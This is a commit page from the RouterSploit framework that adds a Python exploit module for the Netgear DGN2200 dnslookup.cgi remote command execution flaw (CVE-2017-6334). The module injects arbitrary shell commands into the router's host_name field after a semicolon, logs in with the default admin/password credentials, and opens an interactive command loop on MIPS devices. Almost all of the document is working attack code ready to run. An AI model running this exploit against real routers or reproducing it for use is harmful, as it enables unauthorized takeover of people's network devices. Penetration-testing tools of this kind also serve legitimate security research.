Netgear DGN2200 dnslookup.cgi RCE exploit (#209)

* Netgear DGN2200 dnslookup.cgi RCE exploit * Removing redundant comment

Netgear DGN2200 dnslookup.cgi RCE exploit (#209)
* Netgear DGN2200 dnslookup.cgi RCE exploit * Removing redundant comment
ccdb1ea9 · Marcin Bury · Mariusz Kupidura · 79ce7316 · ccdb1ea9
Commit ccdb1ea9 authored Mar 14, 2017 by Marcin Bury Committed by Mariusz Kupidura Mar 14, 2017
Show whitespace changes
Inline Side-by-side

Showing with 60 additions and 0 deletions

dgn2200_dnslookup_cgi_rce.py ...oit/modules/exploits/netgear/dgn2200_dnslookup_cgi_rce.py +60 -0

No files found.
--- a/routersploit/modules/exploits/netgear/dgn2200_dnslookup_cgi_rce.py
+++ b/routersploit/modules/exploits/netgear/dgn2200_dnslookup_cgi_rce.py
+from routersploit import (
+    exploits,
+    print_status,
+    mute,
+    validators,
+    http_request,
+    shell,
+)
+class Exploit(exploits.Exploit):
+    """
+    Exploits Netgear DGN2200 RCE vulnerability through dnslookup.cgi resource.
+    """
+    __info__ = {
+        'name': 'Netgear DGN2200 RCE',
+        'description': 'Exploits Netgear DGN2200 RCE vulnerability through dnslookup.cgi resource',
+        'authors': [
+            'SivertPL',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/41459/',
+            'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6334',
+        ],
+        'devices': [
+            'Netgear DGN2200v1',
+            'Netgear DGN2200v2',
+            'Netgear DGN2200v3',
+            'Netgear DGN2200v4',
+        ],
+    }
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target Port')  # target port
+    username = exploits.Option('admin', 'Username')
+    password = exploits.Option('password', 'Password')
+    def run(self):
+        print_status("It is not possible to check if target is vulnerable")
+        print_status("Trying to invoke command loop...")
+        print_status("It is blind command injection. Response is not available.")
+        shell(self, architecture="mips")
+    def execute(self, cmd):
+        url = "{}:{}/dnslookup.cgi".format(self.target, self.port)
+        payload = "www.google.com; {}".format(cmd)
+        data = {
+            "host_name": payload,
+            "lookup": "Lookup"
+        }
+        http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
+        return ""
+    @mute
+    def check(self):
+        return None  # not possible to check if target is vulnerable